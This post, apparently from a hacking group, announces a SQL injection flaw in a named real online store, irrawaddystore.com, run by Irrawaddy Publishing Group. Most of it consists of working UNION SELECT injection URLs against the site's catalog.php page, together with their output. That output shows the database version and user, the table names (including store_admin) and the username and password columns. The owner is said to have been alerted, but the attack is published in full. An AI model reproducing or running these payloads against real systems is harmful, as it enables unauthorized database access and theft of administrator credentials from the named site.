PlanetCreator.Net’s Security Team Member Info Freakzz <infofreakzzz(at)gmail.com> has reported another critical SQL Injection (vulnerability) on http://www.irrawaddystore.com owned by Irrawaddy Publishing Group.
These are some information from Vulneral Site http://www.irrawaddystore.com :
This vulnerability has been alerted to :-Â sales@irrawaddystore.com
@@version,user(),database()
<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28@@version,0x3a,user%28%29,0x3a,database%28%29%29,8,9,10,11,12,13,14,15,16,17,18--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>
5.0.90-community:irrawadd_user@localhost:irrawadd_store
9
table_name
<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28table_name%29,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.tables%20where%20table_schema=database%28%29--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>
<strong><a href="http://www.irrawaddystore.com/product.php?pro_id=1" target="_blank">store_admin,store_country,</a></strong>
column_name
<a href="http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select%201,2,3,4,5,6,group_concat%28column_name%29,8,9,10,11,12,13,14,15,16,17,18%20from%20information_schema.columns%20where%20table_schema=database%28%29--" target="_blank">http://www.irrawaddystore.com/catalog.php?cat_id=-3%20union%20all%20select</a>
<strong><a href="http://www.irrawaddystore.com/product.php?pro_id=1" target="_blank">id,username,password</a></strong>
We hope that your security staff will look into this issue and fix it as soon as possible.
Thx – Infofreakzzz for sending security updates!